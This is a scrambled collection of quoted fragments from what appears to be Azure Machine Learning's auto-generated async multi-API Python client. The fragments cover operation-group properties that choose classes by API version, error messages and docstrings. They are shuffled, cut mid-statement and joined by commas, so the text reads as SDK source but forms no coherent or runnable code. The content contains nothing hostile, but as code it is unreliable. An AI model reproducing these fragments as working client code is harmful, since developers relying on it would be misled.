ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client,", "import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return", "version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from", "elif api_version == '2021-10-01-dataplanepreview': from 
..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "= self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else:", "the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\"", "version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version", "removed in final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin,", "'1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',", "from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01':", "v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" 
api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import", "* 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions')", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API", "API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01:", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif", "version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: 
:class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>`", "does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return", "self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "_SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support current", "the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` *", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API", "does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_02_01_preview.aio.operations 
import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass", "DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass", "@property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` *", "a fake class to support current implemetation of MultiApiClientMixin.\" Will be removed in", "api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on", "version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version ==", "use if no profile is provided, or if missing in 
profile. :type api_version:", "AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import", "@property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` *", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version", "on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>`", "raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config,", "ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass", "else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client,", "from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import 
EnvironmentVersionsOperations as OperationClass elif api_version", "# Changes may cause incorrect behavior and will be lost if the code", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "* 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return", "does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01':", "* 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers')", "@property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` *", "License. See License.txt in the project root for # license information. # #", "* 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version", "PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version))", "the API version: * v1.0: 
:class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version ==", ":mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>`", "operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends", "* 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers')", "Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>`", "..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as 
OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations", "import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version))", "{} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "The profile sets a mapping between an operation group and its API version.", "from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self,", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` *", "k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: 
:class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version =", "TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class", "..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version", ":class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations", "= self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else:", "import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as", 
"EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version: *", "two polls for LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else:", "group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on", "== '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return", "not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self):", "def 
code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview:", "super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for", "Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>`", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise", "depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01:", "2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "{} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations", "\"\"\" api_version = 
self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as", "not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self):", "have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance", "By default, it uses the latest API version available on public Azure. For", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version: *", "API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0':", "def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview:", "the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete')", "api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass", "operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview:", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version", "self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: *", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01':", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return", "@property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\"", "{} does not have operation group 
'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "* 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "= self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif", "* 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version", "from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import", "ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the", "* 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "= self._get_api_version('delete') if api_version == '1.5.0': from 
..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "\"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as", "CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations", "azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: *", "version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from", "Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>`", "workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>`", "'2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version))", "from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from 
..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API", "@property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` *", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: * v1.0:", "does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version", "version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version =", "elif 
